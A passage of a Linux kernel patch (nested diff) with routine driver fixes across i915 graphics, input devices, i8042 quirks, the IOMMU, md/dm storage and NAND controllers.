++	 * 4. DC5 entry -> DMC saves the already written new
++	 *    _noarm() registers and the old not yet written
++	 *    _arm() registers
++	 * 5. DC5 exit -> DMC restores a mixture of old and
++	 *    new register values and arms the update
++	 * 6. PSR exit -> hardware latches a mixture of old and
++	 *    new register values -> corrupted frame, or worse
++	 * 7. New _arm() registers are finally written
++	 * 8. Hardware finally latches a complete set of new
++	 *    register values, and subsequent frames will be OK again
++	 */
++	wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_DC_OFF);
+ 
+ 	intel_atomic_prepare_plane_clear_colors(state);
+ 
+@@ -7625,8 +7647,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 		 * the culprit.
+ 		 */
+ 		intel_uncore_arm_unclaimed_mmio_detection(&dev_priv->uncore);
+-		intel_display_power_put(dev_priv, POWER_DOMAIN_MODESET, wakeref);
+ 	}
++	intel_display_power_put(dev_priv, POWER_DOMAIN_DC_OFF, wakeref);
+ 	intel_runtime_pm_put(&dev_priv->runtime_pm, state->wakeref);
+ 
+ 	/*
+diff --git a/drivers/gpu/drm/i915/display/intel_dpt.c b/drivers/gpu/drm/i915/display/intel_dpt.c
+index ad1a37b515fb1..2a9f40a2b3ed0 100644
+--- a/drivers/gpu/drm/i915/display/intel_dpt.c
++++ b/drivers/gpu/drm/i915/display/intel_dpt.c
+@@ -301,6 +301,7 @@ intel_dpt_create(struct intel_framebuffer *fb)
+ 	vm->pte_encode = gen8_ggtt_pte_encode;
+ 
+ 	dpt->obj = dpt_obj;
++	dpt->obj->is_dpt = true;
+ 
+ 	return &dpt->vm;
+ }
+@@ -309,5 +310,6 @@ void intel_dpt_destroy(struct i915_address_space *vm)
+ {
+ 	struct i915_dpt *dpt = i915_vm_to_dpt(vm);
+ 
++	dpt->obj->is_dpt = false;
+ 	i915_vm_put(&dpt->vm);
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_tc.c b/drivers/gpu/drm/i915/display/intel_tc.c
+index 70624b4b2d38c..c5d41fd51118f 100644
+--- a/drivers/gpu/drm/i915/display/intel_tc.c
++++ b/drivers/gpu/drm/i915/display/intel_tc.c
+@@ -436,9 +436,9 @@ static bool icl_tc_phy_is_owned(struct intel_digital_port *dig_port)
+ 				PORT_TX_DFLEXDPCSSS(dig_port->tc_phy_fia));
+ 	if (val == 0xffffffff) {
+ 		drm_dbg_kms(&i915->drm,
+-			    "Port %s: PHY in TCCOLD, assume safe mode\n",
++			    "Port %s: PHY in TCCOLD, assume not owned\n",
+ 			    dig_port->tc_port_name);
+-		return true;
++		return false;
+ 	}
+ 
+ 	return val & DP_PHY_MODE_STATUS_NOT_SAFE(dig_port->tc_phy_fia_idx);
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_lmem.c b/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
+index 8949fb0a944f6..3198b64ad7dbc 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
+@@ -127,7 +127,8 @@ i915_gem_object_create_lmem_from_data(struct drm_i915_private *i915,
+ 
+ 	memcpy(map, data, size);
+ 
+-	i915_gem_object_unpin_map(obj);
++	i915_gem_object_flush_map(obj);
++	__i915_gem_object_release_map(obj);
+ 
+ 	return obj;
+ }
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object.h b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+index 3db53769864c2..2f53a68348217 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+@@ -319,7 +319,7 @@ i915_gem_object_never_mmap(const struct drm_i915_gem_object *obj)
+ static inline bool
+ i915_gem_object_is_framebuffer(const struct drm_i915_gem_object *obj)
+ {
+-	return READ_ONCE(obj->frontbuffer);
++	return READ_ONCE(obj->frontbuffer) || obj->is_dpt;
+ }
+ 
+ static inline unsigned int
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+index ab4c2f90a5643..1d0d8ee9d707d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+@@ -491,6 +491,9 @@ struct drm_i915_gem_object {
+ 	 */
+ 	unsigned int cache_dirty:1;
+ 
++	/* @is_dpt: Object houses a display page table (DPT) */
++	unsigned int is_dpt:1;
++
+ 	/**
+ 	 * @read_domains: Read memory domains.
+ 	 *
+diff --git a/drivers/gpu/drm/i915/gt/intel_rps.c b/drivers/gpu/drm/i915/gt/intel_rps.c
+index 9ad3bc7201cba..fc73cfe0e39bb 100644
+--- a/drivers/gpu/drm/i915/gt/intel_rps.c
++++ b/drivers/gpu/drm/i915/gt/intel_rps.c
+@@ -2074,16 +2074,6 @@ void intel_rps_sanitize(struct intel_rps *rps)
+ 		rps_disable_interrupts(rps);
+ }
+ 
+-u32 intel_rps_read_rpstat_fw(struct intel_rps *rps)
+-{
+-	struct drm_i915_private *i915 = rps_to_i915(rps);
+-	i915_reg_t rpstat;
+-
+-	rpstat = (GRAPHICS_VER(i915) >= 12) ? GEN12_RPSTAT1 : GEN6_RPSTAT1;
+-
+-	return intel_uncore_read_fw(rps_to_gt(rps)->uncore, rpstat);
+-}
+-
+ u32 intel_rps_read_rpstat(struct intel_rps *rps)
+ {
+ 	struct drm_i915_private *i915 = rps_to_i915(rps);
+@@ -2094,7 +2084,7 @@ u32 intel_rps_read_rpstat(struct intel_rps *rps)
+ 	return intel_uncore_read(rps_to_gt(rps)->uncore, rpstat);
+ }
+ 
+-u32 intel_rps_get_cagf(struct intel_rps *rps, u32 rpstat)
++static u32 intel_rps_get_cagf(struct intel_rps *rps, u32 rpstat)
+ {
+ 	struct drm_i915_private *i915 = rps_to_i915(rps);
+ 	u32 cagf;
+@@ -2117,10 +2107,11 @@ u32 intel_rps_get_cagf(struct intel_rps *rps, u32 rpstat)
+ 	return cagf;
+ }
+ 
+-static u32 read_cagf(struct intel_rps *rps)
++static u32 __read_cagf(struct intel_rps *rps, bool take_fw)
+ {
+ 	struct drm_i915_private *i915 = rps_to_i915(rps);
+ 	struct intel_uncore *uncore = rps_to_uncore(rps);
++	i915_reg_t r = INVALID_MMIO_REG;
+ 	u32 freq;
+ 
+ 	/*
+@@ -2128,22 +2119,30 @@ static u32 read_cagf(struct intel_rps *rps)
+ 	 * registers will return 0 freq when GT is in RC6
+ 	 */
+ 	if (GRAPHICS_VER_FULL(i915) >= IP_VER(12, 70)) {
+-		freq = intel_uncore_read(uncore, MTL_MIRROR_TARGET_WP1);
++		r = MTL_MIRROR_TARGET_WP1;
+ 	} else if (GRAPHICS_VER(i915) >= 12) {
+-		freq = intel_uncore_read(uncore, GEN12_RPSTAT1);
++		r = GEN12_RPSTAT1;
+ 	} else if (IS_VALLEYVIEW(i915) || IS_CHERRYVIEW(i915)) {
+ 		vlv_punit_get(i915);
+ 		freq = vlv_punit_read(i915, PUNIT_REG_GPU_FREQ_STS);
+ 		vlv_punit_put(i915);
+ 	} else if (GRAPHICS_VER(i915) >= 6) {
+-		freq = intel_uncore_read(uncore, GEN6_RPSTAT1);
++		r = GEN6_RPSTAT1;
+ 	} else {
+-		freq = intel_uncore_read(uncore, MEMSTAT_ILK);
++		r = MEMSTAT_ILK;
+ 	}
+ 
++	if (i915_mmio_reg_valid(r))
++		freq = take_fw ? intel_uncore_read(uncore, r) : intel_uncore_read_fw(uncore, r);
++
+ 	return intel_rps_get_cagf(rps, freq);
+ }
+ 
++static u32 read_cagf(struct intel_rps *rps)
++{
++	return __read_cagf(rps, true);
++}
++
+ u32 intel_rps_read_actual_frequency(struct intel_rps *rps)
+ {
+ 	struct intel_runtime_pm *rpm = rps_to_uncore(rps)->rpm;
+@@ -2156,7 +2155,12 @@ u32 intel_rps_read_actual_frequency(struct intel_rps *rps)
+ 	return freq;
+ }
+ 
+-u32 intel_rps_read_punit_req(struct intel_rps *rps)
++u32 intel_rps_read_actual_frequency_fw(struct intel_rps *rps)
++{
++	return intel_gpu_freq(rps, __read_cagf(rps, false));
++}
++
++static u32 intel_rps_read_punit_req(struct intel_rps *rps)
+ {
+ 	struct intel_uncore *uncore = rps_to_uncore(rps);
+ 	struct intel_runtime_pm *rpm = rps_to_uncore(rps)->rpm;
+diff --git a/drivers/gpu/drm/i915/gt/intel_rps.h b/drivers/gpu/drm/i915/gt/intel_rps.h
+index 9e1cad9ba0e9c..d86ddfee095ed 100644
+--- a/drivers/gpu/drm/i915/gt/intel_rps.h
++++ b/drivers/gpu/drm/i915/gt/intel_rps.h
+@@ -34,8 +34,8 @@ void intel_rps_mark_interactive(struct intel_rps *rps, bool interactive);
+ 
+ int intel_gpu_freq(struct intel_rps *rps, int val);
+ int intel_freq_opcode(struct intel_rps *rps, int val);
+-u32 intel_rps_get_cagf(struct intel_rps *rps, u32 rpstat1);
+ u32 intel_rps_read_actual_frequency(struct intel_rps *rps);
++u32 intel_rps_read_actual_frequency_fw(struct intel_rps *rps);
+ u32 intel_rps_get_requested_frequency(struct intel_rps *rps);
+ u32 intel_rps_get_min_frequency(struct intel_rps *rps);
+ u32 intel_rps_get_min_raw_freq(struct intel_rps *rps);
+@@ -46,10 +46,8 @@ int intel_rps_set_max_frequency(struct intel_rps *rps, u32 val);
+ u32 intel_rps_get_rp0_frequency(struct intel_rps *rps);
+ u32 intel_rps_get_rp1_frequency(struct intel_rps *rps);
+ u32 intel_rps_get_rpn_frequency(struct intel_rps *rps);
+-u32 intel_rps_read_punit_req(struct intel_rps *rps);
+ u32 intel_rps_read_punit_req_frequency(struct intel_rps *rps);
+ u32 intel_rps_read_rpstat(struct intel_rps *rps);
+-u32 intel_rps_read_rpstat_fw(struct intel_rps *rps);
+ void gen6_rps_get_freq_caps(struct intel_rps *rps, struct intel_rps_freq_caps *caps);
+ void intel_rps_raise_unslice(struct intel_rps *rps);
+ void intel_rps_lower_unslice(struct intel_rps *rps);
+diff --git a/drivers/gpu/drm/i915/i915_perf.c b/drivers/gpu/drm/i915/i915_perf.c
+index 125b6ca25a756..7d5e2c53c23a7 100644
+--- a/drivers/gpu/drm/i915/i915_perf.c
++++ b/drivers/gpu/drm/i915/i915_perf.c
+@@ -1592,9 +1592,7 @@ static void i915_oa_stream_destroy(struct i915_perf_stream *stream)
+ 	/*
+ 	 * Wa_16011777198:dg2: Unset the override of GUCRC mode to enable rc6.
+ 	 */
+-	if (intel_uc_uses_guc_rc(&gt->uc) &&
+-	    (IS_DG2_GRAPHICS_STEP(gt->i915, G10, STEP_A0, STEP_C0) ||
+-	     IS_DG2_GRAPHICS_STEP(gt->i915, G11, STEP_A0, STEP_B0)))
++	if (stream->override_gucrc)
+ 		drm_WARN_ON(&gt->i915->drm,
+ 			    intel_guc_slpc_unset_gucrc_mode(&gt->uc.guc.slpc));
+ 
+@@ -3293,8 +3291,10 @@ static int i915_oa_stream_init(struct i915_perf_stream *stream,
+ 		if (ret) {
+ 			drm_dbg(&stream->perf->i915->drm,
+ 				"Unable to override gucrc mode\n");
+-			goto err_config;
++			goto err_gucrc;
+ 		}
++
++		stream->override_gucrc = true;
+ 	}
+ 
+ 	ret = alloc_oa_buffer(stream);
+@@ -3333,11 +3333,15 @@ err_enable:
+ 	free_oa_buffer(stream);
+ 
+ err_oa_buf_alloc:
+-	free_oa_configs(stream);
++	if (stream->override_gucrc)
++		intel_guc_slpc_unset_gucrc_mode(&gt->uc.guc.slpc);
+ 
++err_gucrc:
+ 	intel_uncore_forcewake_put(stream->uncore, FORCEWAKE_ALL);
+ 	intel_engine_pm_put(stream->engine);
+ 
++	free_oa_configs(stream);
++
+ err_config:
+ 	free_noa_wait(stream);
+ 
+diff --git a/drivers/gpu/drm/i915/i915_perf_types.h b/drivers/gpu/drm/i915/i915_perf_types.h
+index ca150b7af3f29..4d5d8c365d9e2 100644
+--- a/drivers/gpu/drm/i915/i915_perf_types.h
++++ b/drivers/gpu/drm/i915/i915_perf_types.h
+@@ -316,6 +316,12 @@ struct i915_perf_stream {
+ 	 * buffer should be checked for available data.
+ 	 */
+ 	u64 poll_oa_period;
++
++	/**
++	 * @override_gucrc: GuC RC has been overridden for the perf stream,
++	 * and we need to restore the default configuration on release.
++	 */
++	bool override_gucrc;
+ };
+ 
+ /**
+diff --git a/drivers/gpu/drm/i915/i915_pmu.c b/drivers/gpu/drm/i915/i915_pmu.c
+index 52531ab28c5f5..6d422b056f8a8 100644
+--- a/drivers/gpu/drm/i915/i915_pmu.c
++++ b/drivers/gpu/drm/i915/i915_pmu.c
+@@ -393,14 +393,12 @@ frequency_sample(struct intel_gt *gt, unsigned int period_ns)
+ 		 * case we assume the system is running at the intended
+ 		 * frequency. Fortunately, the read should rarely fail!
+ 		 */
+-		val = intel_rps_read_rpstat_fw(rps);
+-		if (val)
+-			val = intel_rps_get_cagf(rps, val);
+-		else
+-			val = rps->cur_freq;
++		val = intel_rps_read_actual_frequency_fw(rps);
++		if (!val)
++			val = intel_gpu_freq(rps, rps->cur_freq);
+ 
+ 		add_sample_mult(&pmu->sample[__I915_SAMPLE_FREQ_ACT],
+-				intel_gpu_freq(rps, val), period_ns / 1000);
++				val, period_ns / 1000);
+ 	}
+ 
+ 	if (pmu->enable & config_mask(I915_PMU_REQUESTED_FREQUENCY)) {
+diff --git a/drivers/gpu/drm/nouveau/nouveau_backlight.c b/drivers/gpu/drm/nouveau/nouveau_backlight.c
+index 40409a29f5b69..91b5ecc575380 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_backlight.c
++++ b/drivers/gpu/drm/nouveau/nouveau_backlight.c
+@@ -33,6 +33,7 @@
+ #include <linux/apple-gmux.h>
+ #include <linux/backlight.h>
+ #include <linux/idr.h>
++#include <drm/drm_probe_helper.h>
+ 
+ #include "nouveau_drv.h"
+ #include "nouveau_reg.h"
+@@ -299,8 +300,12 @@ nv50_backlight_init(struct nouveau_backlight *bl,
+ 	struct nouveau_drm *drm = nouveau_drm(nv_encoder->base.base.dev);
+ 	struct nvif_object *device = &drm->client.device.object;
+ 
++	/*
++	 * Note when this runs the connectors have not been probed yet,
++	 * so nv_conn->base.status is not set yet.
++	 */
+ 	if (!nvif_rd32(device, NV50_PDISP_SOR_PWM_CTL(ffs(nv_encoder->dcb->or) - 1)) ||
+-	    nv_conn->base.status != connector_status_connected)
++	    drm_helper_probe_detect(&nv_conn->base, NULL, false) != connector_status_connected)
+ 		return -ENODEV;
+ 
+ 	if (nv_conn->type == DCB_CONNECTOR_eDP) {
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index f060ac7376e69..cfeb24d40d378 100644
+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -168,7 +168,13 @@ static __cpuidle int intel_idle_irq(struct cpuidle_device *dev,
+ 
+ 	raw_local_irq_enable();
+ 	ret = __intel_idle(dev, drv, index);
+-	raw_local_irq_disable();
++
++	/*
++	 * The lockdep hardirqs state may be changed to 'on' with timer
++	 * tick interrupt followed by __do_softirq(). Use local_irq_disable()
++	 * to keep the hardirqs state correct.
++	 */
++	local_irq_disable();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 2959d80f7fdb6..cd36cf7165423 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -779,9 +779,6 @@ static void xpad_process_packet(struct usb_xpad *xpad, u16 cmd, unsigned char *d
+ 	input_report_key(dev, BTN_C, data[8]);
+ 	input_report_key(dev, BTN_Z, data[9]);
+ 
+-	/* Profile button has a value of 0-3, so it is reported as an axis */
+-	if (xpad->mapping & MAP_PROFILE_BUTTON)
+-		input_report_abs(dev, ABS_PROFILE, data[34]);
+ 
+ 	input_sync(dev);
+ }
+@@ -1059,6 +1056,10 @@ static void xpadone_process_packet(struct usb_xpad *xpad, u16 cmd, unsigned char
+ 					(__u16) le16_to_cpup((__le16 *)(data + 8)));
+ 		}
+ 
++		/* Profile button has a value of 0-3, so it is reported as an axis */
++		if (xpad->mapping & MAP_PROFILE_BUTTON)
++			input_report_abs(dev, ABS_PROFILE, data[34]);
++
+ 		/* paddle handling */
+ 		/* based on SDL's SDL_hidapi_xboxone.c */
+ 		if (xpad->mapping & MAP_PADDLES) {
+diff --git a/drivers/input/mouse/alps.c b/drivers/input/mouse/alps.c
+index 989228b5a0a44..e2c11d9f3868f 100644
+--- a/drivers/input/mouse/alps.c
++++ b/drivers/input/mouse/alps.c
+@@ -852,8 +852,8 @@ static void alps_process_packet_v6(struct psmouse *psmouse)
+ 			x = y = z = 0;
+ 
+ 		/* Divide 4 since trackpoint's speed is too fast */
+-		input_report_rel(dev2, REL_X, (char)x / 4);
+-		input_report_rel(dev2, REL_Y, -((char)y / 4));
++		input_report_rel(dev2, REL_X, (s8)x / 4);
++		input_report_rel(dev2, REL_Y, -((s8)y / 4));
+ 
+ 		psmouse_report_standard_buttons(dev2, packet[3]);
+ 
+@@ -1104,8 +1104,8 @@ static void alps_process_trackstick_packet_v7(struct psmouse *psmouse)
+ 	    ((packet[3] & 0x20) << 1);
+ 	z = (packet[5] & 0x3f) | ((packet[3] & 0x80) >> 1);
+ 
+-	input_report_rel(dev2, REL_X, (char)x);
+-	input_report_rel(dev2, REL_Y, -((char)y));
++	input_report_rel(dev2, REL_X, (s8)x);
++	input_report_rel(dev2, REL_Y, -((s8)y));
+ 	input_report_abs(dev2, ABS_PRESSURE, z);
+ 
+ 	psmouse_report_standard_buttons(dev2, packet[1]);
+@@ -2294,20 +2294,20 @@ static int alps_get_v3_v7_resolution(struct psmouse *psmouse, int reg_pitch)
+ 	if (reg < 0)
+ 		return reg;
+ 
+-	x_pitch = (char)(reg << 4) >> 4; /* sign extend lower 4 bits */
++	x_pitch = (s8)(reg << 4) >> 4; /* sign extend lower 4 bits */
+ 	x_pitch = 50 + 2 * x_pitch; /* In 0.1 mm units */
+ 
+-	y_pitch = (char)reg >> 4; /* sign extend upper 4 bits */
++	y_pitch = (s8)reg >> 4; /* sign extend upper 4 bits */
+ 	y_pitch = 36 + 2 * y_pitch; /* In 0.1 mm units */
+ 
+ 	reg = alps_command_mode_read_reg(psmouse, reg_pitch + 1);
+ 	if (reg < 0)
+ 		return reg;
+ 
+-	x_electrode = (char)(reg << 4) >> 4; /* sign extend lower 4 bits */
++	x_electrode = (s8)(reg << 4) >> 4; /* sign extend lower 4 bits */
+ 	x_electrode = 17 + x_electrode;
+ 
+-	y_electrode = (char)reg >> 4; /* sign extend upper 4 bits */
++	y_electrode = (s8)reg >> 4; /* sign extend upper 4 bits */
+ 	y_electrode = 13 + y_electrode;
+ 
+ 	x_phys = x_pitch * (x_electrode - 1); /* In 0.1 mm units */
+diff --git a/drivers/input/mouse/focaltech.c b/drivers/input/mouse/focaltech.c
+index 6fd5fff0cbfff..c74b99077d16a 100644
+--- a/drivers/input/mouse/focaltech.c
++++ b/drivers/input/mouse/focaltech.c
+@@ -202,8 +202,8 @@ static void focaltech_process_rel_packet(struct psmouse *psmouse,
+ 	state->pressed = packet[0] >> 7;
+ 	finger1 = ((packet[0] >> 4) & 0x7) - 1;
+ 	if (finger1 < FOC_MAX_FINGERS) {
+-		state->fingers[finger1].x += (char)packet[1];
+-		state->fingers[finger1].y += (char)packet[2];
++		state->fingers[finger1].x += (s8)packet[1];
++		state->fingers[finger1].y += (s8)packet[2];
+ 	} else {
+ 		psmouse_err(psmouse, "First finger in rel packet invalid: %d\n",
+ 			    finger1);
+@@ -218,8 +218,8 @@ static void focaltech_process_rel_packet(struct psmouse *psmouse,
+ 	 */
+ 	finger2 = ((packet[3] >> 4) & 0x7) - 1;
+ 	if (finger2 < FOC_MAX_FINGERS) {
+-		state->fingers[finger2].x += (char)packet[4];
+-		state->fingers[finger2].y += (char)packet[5];
++		state->fingers[finger2].x += (s8)packet[4];
++		state->fingers[finger2].y += (s8)packet[5];
+ 	}
+ }
+ 
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index efc61736099b9..028e45bd050bf 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -610,6 +610,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
+ 	},
++	{
++		/* Fujitsu Lifebook A574/H */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "FMVA0501PZ"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
++	},
+ 	{
+ 		/* Gigabyte M912 */
+ 		.matches = {
+@@ -1116,6 +1124,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
++		 * the keyboard very laggy for ~5 seconds after boot and
++		 * sometimes also after resume.
++		 * However both are required for the keyboard to not fail
++		 * completely sometimes after boot or resume.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "N150CU"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NH5xAx"),
+@@ -1123,6 +1145,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
++		 * the keyboard very laggy for ~5 seconds after boot and
++		 * sometimes also after resume.
++		 * However both are required for the keyboard to not fail
++		 * completely sometimes after boot or resume.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NHxxRZQ"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NL5xRU"),
+diff --git a/drivers/input/touchscreen/goodix.c b/drivers/input/touchscreen/goodix.c
+index 8a0a8078de8f7..2e502fcb0d1fd 100644
+--- a/drivers/input/touchscreen/goodix.c
++++ b/drivers/input/touchscreen/goodix.c
+@@ -124,10 +124,18 @@ static const unsigned long goodix_irq_flags[] = {
+ static const struct dmi_system_id nine_bytes_report[] = {
+ #if defined(CONFIG_DMI) && defined(CONFIG_X86)
+ 	{
+-		.ident = "Lenovo YogaBook",
+-		/* YB1-X91L/F and YB1-X90L/F */
++		/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9")
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		}
++	},
++	{
++		/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++			/* Non exact match to match F + L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		}
+ 	},
+ #endif
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index b00a0ceb2d137..c80c524ad32d7 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -1057,7 +1057,8 @@ static int alloc_iommu(struct dmar_drhd_unit *drhd)
+ 	}
+ 
+ 	err = -EINVAL;
+-	if (cap_sagaw(iommu->cap) == 0) {
++	if (!cap_sagaw(iommu->cap) &&
++	    (!ecap_smts(iommu->ecap) || ecap_slts(iommu->ecap))) {
+ 		pr_info("%s: No supported address widths. Not attempting DMA translation.\n",
+ 			iommu->name);
+ 		drhd->ignored = 1;
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index fc953013ea260..1b6c3c783a8eb 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -1509,6 +1509,8 @@ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+ 		ret = 1;
+ 		break;
+ 	default:
++		if (len)
++			setup_split_accounting(ci, *len);
+ 		/* dm_accept_partial_bio() is not supported with shared tio->len_ptr */
+ 		alloc_multiple_bios(&blist, ci, ti, num_bios);
+ 		while ((clone = bio_list_pop(&blist))) {
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 272cc5d14906f..beab84f0c585c 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -3131,6 +3131,9 @@ slot_store(struct md_rdev *rdev, const char *buf, size_t len)
+ 		err = kstrtouint(buf, 10, (unsigned int *)&slot);
+ 		if (err < 0)
+ 			return err;
++		if (slot < 0)
++			/* overflow */
++			return -ENOSPC;
+ 	}
+ 	if (rdev->mddev->pers && slot == -1) {
+ 		/* Setting 'slot' on an active array requires also
+diff --git a/drivers/media/platform/qcom/venus/firmware.c b/drivers/media/platform/qcom/venus/firmware.c
+index 142d4c74017c0..d59ecf776715c 100644
+--- a/drivers/media/platform/qcom/venus/firmware.c
++++ b/drivers/media/platform/qcom/venus/firmware.c
+@@ -38,8 +38,8 @@ static void venus_reset_cpu(struct venus_core *core)
+ 	writel(fw_size, wrapper_base + WRAPPER_FW_END_ADDR);
+ 	writel(0, wrapper_base + WRAPPER_CPA_START_ADDR);
+ 	writel(fw_size, wrapper_base + WRAPPER_CPA_END_ADDR);
+-	writel(0, wrapper_base + WRAPPER_NONPIX_START_ADDR);
+-	writel(0, wrapper_base + WRAPPER_NONPIX_END_ADDR);
++	writel(fw_size, wrapper_base + WRAPPER_NONPIX_START_ADDR);
++	writel(fw_size, wrapper_base + WRAPPER_NONPIX_END_ADDR);
+ 
+ 	if (IS_V6(core)) {
+ 		/* Bring XTSS out of reset */
+diff --git a/drivers/mtd/nand/ecc-mxic.c b/drivers/mtd/nand/ecc-mxic.c
+index 8afdca731b874..6b487ffe2f2dc 100644
+--- a/drivers/mtd/nand/ecc-mxic.c
++++ b/drivers/mtd/nand/ecc-mxic.c
+@@ -429,6 +429,7 @@ static int mxic_ecc_data_xfer_wait_for_completion(struct mxic_ecc_engine *mxic)
+ 		mxic_ecc_enable_int(mxic);
+ 		ret = wait_for_completion_timeout(&mxic->complete,
+ 						  msecs_to_jiffies(1000));
++		ret = ret ? 0 : -ETIMEDOUT;
+ 		mxic_ecc_disable_int(mxic);
+ 	} else {
+ 		ret = readl_poll_timeout(mxic->regs + INTRPT_STS, val,
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 5ee01231ac4cd..a28574c009003 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -176,6 +176,7 @@ struct meson_nfc {
+ 
+ 	dma_addr_t daddr;
+ 	dma_addr_t iaddr;
++	u32 info_bytes;
+ 
+ 	unsigned long assigned_cs;
+ };
+@@ -503,6 +504,7 @@ static int meson_nfc_dma_buffer_setup(struct nand_chip *nand, void *databuf,
+ 					 nfc->daddr, datalen, dir);
+ 			return ret;
+ 		}
++		nfc->info_bytes = infolen;
+ 		cmd = GENCMDIADDRL(NFC_CMD_AIL, nfc->iaddr);
+ 		writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+@@ -520,8 +522,10 @@ static void meson_nfc_dma_buffer_release(struct nand_chip *nand,
+ 	struct meson_nfc *nfc = nand_get_controller_data(nand);
+ 
+ 	dma_unmap_single(nfc->dev, nfc->daddr, datalen, dir);
+-	if (infolen)
++	if (infolen) {
+ 		dma_unmap_single(nfc->dev, nfc->iaddr, infolen, dir);
++		nfc->info_bytes = 0;
++	}
+ }
+ 
+ static int meson_nfc_read_buf(struct nand_chip *nand, u8 *buf, int len)
+@@ -710,6 +714,8 @@ static void meson_nfc_check_ecc_pages_valid(struct meson_nfc *nfc,
+ 		usleep_range(10, 15);
+ 		/* info is updated by nfc dma engine*/
+ 		smp_rmb();
++		dma_sync_single_for_cpu(nfc->dev, nfc->iaddr, nfc->info_bytes,
++					DMA_FROM_DEVICE);
+ 		ret = *info & ECC_COMPLETE;
+ 	} while (!ret);
+ }
+@@ -991,7 +997,7 @@ static const struct mtd_ooblayout_ops meson_ooblayout_ops = {
+ 
+ static int meson_nfc_clk_init(struct meson_nfc *nfc)
+ {
+-	struct clk_parent_data nfc_divider_parent_data[1];
++	struct clk_parent_data nfc_divider_parent_data[1] = {0};
+ 	struct clk_init_data init = {0};
+ 	int ret;
+ 
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index 003b0ac2854c9..3fffd5da8d3b0 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -958,15 +958,14 @@ int ksz8_fdb_dump(struct ksz_device *dev, int port,
+ 	u16 entries = 0;
+ 	u8 timestamp = 0;
